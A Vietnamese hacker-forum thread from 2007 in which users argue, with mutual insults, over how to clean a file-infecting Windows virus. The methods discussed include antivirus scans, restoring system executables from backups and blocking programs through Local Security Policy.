Máy cài 2 win, bị nhiễm virus ở win này -> win kia bị lây tràn lan. Vừa dùng Bkav xong giờ ngon lành.

GhostShip thử phát smilie 
Mấy cái cậu nói nó hơi bị vớ vẩn, kô đáng để thử.

born2die wrote:
Mà nói thật chứ, nói câu không diệt được lây file có gì sai đâu mà không nhận nhỉ. Bản thân tôi nhận luôn là không tự diệt được worm, nhưng quan trọng là tôi sẽ cố gắng để diệt được. Chứ không nhận, lảng tránh thì đến bao giờ mới khá lên được. Đôi lời.... 
ừ nó kô sai mà nó chỉ đúng với gà thôi smilie cố gắng diệt cái kiểu ấy thì mãi là gà thôi. gà nhưng kô biết mình là gà thì quả là vô đối smilie

Kô ghét gà chỉ ghét gà nhưng lại cứ thích thể hiện nói như đúng rồi, cứ nghĩ ai cũng gà như mình vậy.
C:\PROCESS -K Explorer.exe  

Nếu mình kô nhầm thì dòng này có tác dụng kill process Explorer.exe, nhưng mình thử kô thấy có tác dụng smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 15:26:51 (+0700) | #53 | 105928
[Avatar]
VXer
Member

[Minus]    0    [Plus]
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
[Profile] [PM]
Các cao thủ cho gà này đóng góp chút ý kiến nhá smilie

Ghost Ship wrote:
vậy nếu nó kô chừa mấy file hệ thống thì các AV có diệt được nó kô? hay là del hết file OS bị nhiễm rồi cho khổ chủ làm lại win? 


Bạn ơi sao các AV diệt virus lây file là "del hết"?? Tui nhớ nhiều thằng nó disinfect lắm mờ!

Ghost Ship wrote:
Nói cho cậu biêt dù nó có ăn file hệ thống thì cách diệt của tôi vẫn thịt được nó mà kô cần làm lại win 

Ghê ah nha! Bác dùng ollydbg, hexworkshop ... mở từng file ra rồi disinfect hả? Cho gà này học hỏi với!! Gà này chỉ biết trong trường hợp lây file thì tốt nhất là tìm thằng AV nào xịn xịn mang về test thử, tốt nhất là ghost lại ổ trước khi quét ah! Còn thích tự túc thì vác mẫu sang máy khác mà debug rồi làm tool. Mai mốt khăn gói sang nhà bác GS nhờ bác dạy disinfect bằng tay nhá smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 16:16:16 (+0700) | #54 | 105932
sirlinh
Member

[Minus]    0    [Plus]
Joined: 25/12/2007 03:21:14
Messages: 1
Offline
[Profile] [PM]
Hic hic. Nói dùm em cách diệt cẩn thận được ko . Cũng mới bị dính loại này mà mãi ko xong . bác GS ơi đang online ra yaoo được ko . nick là onlyphuong99@yahoo.com
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 16:21:43 (+0700) | #55 | 105933
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]
Edited chờ del smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 16:24:57 (+0700) | #56 | 105934
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

VXer wrote:
Bạn ơi sao các AV diệt virus lây file là "del hết"?? Tui nhớ nhiều thằng nó disinfect lắm mờ!  
Nhiều nhưng kô phải tất cả. kô biết cái nhiều của bạn là bao nhiêu % nhỉ? mình thì thấy mấy AV mình dùng toàn del thôi KAV và AVG là 2 cái mình đã dùng còn những cái khác chưa thử nghe nói đa số toàn del luôn.

VXer wrote:

Ghost Ship wrote:
Nói cho cậu biêt dù nó có ăn file hệ thống thì cách diệt của tôi vẫn thịt được nó mà kô cần làm lại win 

Ghê ah nha! Bác dùng ollydbg, hexworkshop ... mở từng file ra rồi disinfect hả? Cho gà này học hỏi với!! Gà này chỉ biết trong trường hợp lây file thì tốt nhất là tìm thằng AV nào xịn xịn mang về test thử, tốt nhất là ghost lại ổ trước khi quét ah! Còn thích tự túc thì vác mẫu sang máy khác mà debug rồi làm tool. Mai mốt khăn gói sang nhà bác GS nhờ bác dạy disinfect bằng tay nhá smilie  
hề mình gọi người khác là gà kô có nghĩa là mình gọi mình là cao thủ đâu smilie giống như có người đá bóng kô hay nhưng nhìn thi đấu thì biết ai đá dở ai đá hay vậy đó smilie

Cách diệt của mình rất đơn giản (nếu kô muốn nói là nông dân smilie) nhưng mình nghĩ là hiệu quả và mình đã làm khá nhiều lần thành công.
1. Khi máy mới cài win xong mình copy toàn bộ file .exe trong thư mục c:\windows ra một ổ khác nén lại cẩn thận. kô nhiều đâu chỉ khoảng 50MB thôi. nén xong còn cỡ gần 30MB
2. Khi máy bị nhiễm thì vô hiệu phần hoạt động của virus trước.
3. Sau khi vô hiệu được phần hoạt động của virus thì mình sẽ dùng một AV đã update con đó để quét thư mục hệ thống (c:\windows) mình thường dùng KAV. Thấy nó báo file nào bị nhiễm thì vào cái chỗ mình đã sao lưu copy ra đè lên file bị nhiễm đó chứ chả cần phải phân tích rồi tách tiếc chi cho mệt smilie Nếu một số fiel kô đè được trong win(kô nhiều) thì tạm bỏ qua ghi nó lại rồi ra dos để đè.

Quan trọng vẫn là phát hiện sớm điều trị kịp thời. Nếu con nào nó mới quá chưa có Av nào update thì có thể dùng Local Security Policy để ngăn kô cho nó được kích hoạt --> dù có click vào file bị nhiễm thì con virus cũng kô thể chạy được --> kô thể lây thêm đượcsmilie đợi lúc nào có AV phát hiện ra thì tiến hành thay file.

nếu mới bị nhiễm mà diệt ngay thì thay còn đỡ chứ nếu để nó nhiễm cỡ vài hôm hay vài tuần rồi thì cài lại win cho nhanh chứ thay hết file thì có mà ngất smilie

Đơn giản vậy thôi smilie

P/S: Hic em lại ấn nhầm chỉnh thành trích roài smilie pác mod nào del hộ em bài trên nhé. Khuya rồi em hơi hoa mắt smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 22:20:15 (+0700) | #57 | 105959
[Avatar]
VXer
Member

[Minus]    0    [Plus]
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
[Profile] [PM]

Ghost Ship wrote:
Nhiều nhưng kô phải tất cả. kô biết cái nhiều của bạn là bao nhiêu % nhỉ? mình thì thấy mấy AV mình dùng toàn del thôi KAV và AVG là 2 cái mình đã dùng còn những cái khác chưa thử nghe nói đa số toàn del luôn. 

BKAV smilie smilie! Cái mà bác bảo không đáng thử đó smilie smilie. Nói thật là cũng hơi bị bất ngờ smilie

Ghost Ship wrote:

1. Khi máy mới cài win xong mình copy toàn bộ file .exe trong thư mục c:\windows ra một ổ khác nén lại cẩn thận. kô nhiều đâu chỉ khoảng 50MB thôi. nén xong còn cỡ gần 30MB
 

smilie smilie má ơi thế này gọi là diệt virus lây file đó sao smilie smilie Cũng dám gọi người khác là gà cơ đấy smilie smilie
Làm như ông thì có cách đơn giản hơn dó, copy ra chỗ khác mà làm gì, copy toàn bộ exe trong hệ thống rồi đổi phần mở rộng, exx chẳng hạn. Khi nào thấy 2 file khác size (file .exe và .exx sao chép ra trước đó) thì nghi ngờ là virus, hiện tượng này lặp lại trên nhiều file thì có thể kết luận thành virus đc roài. Boot từ CD rồi copy hết file .exx thành .exe như ban đầu, xong reboot.

Hic cứ tưởng ông debug rồi ngồi viết tool diệt, zậy mà còn đi chê av khác, rùi còn kêu người khác là gà, xong lại post cách zải quyết rất hoành tá tràng, đúng là chăn gà smilie smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 23:45:33 (+0700) | #58 | 105966
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

VXer wrote:

Ghost Ship wrote:
Nhiều nhưng kô phải tất cả. kô biết cái nhiều của bạn là bao nhiêu % nhỉ? mình thì thấy mấy AV mình dùng toàn del thôi KAV và AVG là 2 cái mình đã dùng còn những cái khác chưa thử nghe nói đa số toàn del luôn. 

BKAV smilie smilie! Cái mà bác bảo không đáng thử đó smilie smilie. Nói thật là cũng hơi bị bất ngờ smilie  


KAV (Kaspersky Anti-virus) chứ kô phải BKAV nhé.

VXer wrote:

Ghost Ship wrote:
1. Khi máy mới cài win xong mình copy toàn bộ file .exe trong thư mục c:\windows ra một ổ khác nén lại cẩn thận. kô nhiều đâu chỉ khoảng 50MB thôi. nén xong còn cỡ gần 30MB 

smilie smilie má ơi thế này gọi là diệt virus lây file đó sao smilie smilie Cũng dám gọi người khác là gà cơ đấy smilie smilie
Làm như ông thì có cách đơn giản hơn dó, copy ra chỗ khác mà làm gì, copy toàn bộ exe trong hệ thống rồi đổi phần mở rộng, exx chẳng hạn. Khi nào thấy 2 file khác size (file .exe và .exx sao chép ra trước đó) thì nghi ngờ là virus, hiện tượng này lặp lại trên nhiều file thì có thể kết luận thành virus đc roài. Boot từ CD rồi copy hết file .exx thành .exe như ban đầu, xong reboot.  
trong %windir% có bao nhiêu file exe mà cậu lại tính chuyện copy ròi đổi phần mở rộng của chúng? làm bằng tay á smilie tại sao sao lại phải boot từ CD khi mà có thể làm trong win dễ dàng?

VXer wrote:
Hic cứ tưởng ông debug rồi ngồi viết tool diệt, zậy mà còn đi chê av khác, rùi còn kêu người khác là gà, xong lại post cách zải quyết rất hoành tá tràng, đúng là chăn gà smilie smilie  
debug rồi viết tool đâu phải ai cũng làm được? tui nói để ai cũng có thể làm dễ dàng chứ kô phải để khoe hàng nên tôi kô thích tìm hiểu những cách phức tạp. Cách của tôi ai cũng làm được kể cả gà.

Có thể anh kô gà về kiến thức nhưng nếu anh gà về tư duy thì anh sẽ luôn làm mọi việc trở nên phức tạp. kiểu như để giết một con kiến anh lại đi cho nó vào phong thì nghiệm nghiên cứu chán chê để chế ra một loại thuốc độc rành riêng cho nó (để thể hiện mình là pro smilie) thay vì một cái bóp tay vậy smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/12/2007 23:53:00 (+0700) | #59 | 105967
[Avatar]
dangminh4
Member

[Minus]    0    [Plus]
Joined: 04/02/2007 21:44:21
Messages: 107
Offline
[Profile] [PM]
Mấy con virus này thì diệt có gì khó đâu , hiện nay cái khó mình muốn hỏi ở đây là hiện tượng mở một số ứng dụng rất là lâu , đặc biệt là mở trình duyệt IE bác nào biết về cái này thì nói cho tui vói nhé , cám ơn
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 26/12/2007 00:13:01 (+0700) | #60 | 105976
born2die
Member

[Minus]    0    [Plus]
Joined: 17/12/2007 11:49:02
Messages: 16
Offline
[Profile] [PM]
"Có thể anh kô gà về kiến thức nhưng nếu anh gà về tư duy thì anh sẽ luôn làm mọi việc trở nên phức tạp. kiểu như để giết một con kiến anh lại đi cho nó vào phong thì nghiệm nghiên cứu chán chê để chế ra một loại thuốc độc rành riêng cho nó (để thể hiện mình là pro ) thay vì một cái bóp tay vậy "

Ôi ôi, lây file mà GS gọi là "kiến", quả là siêu cao...gà smilie), há há há há, chết mất, bó cờ him.

Nói cho gà GS biết chứ mấy bài đầu có người miêu tả khá chi tiết rồi, iem gà của bác theo hướng đó đã viết được tool remove rồi, chẳng qua khiêm tốn tí cho bác tự sướng thôi, há há há. Cần em gửi tool không, xin một tiếng smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
2 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|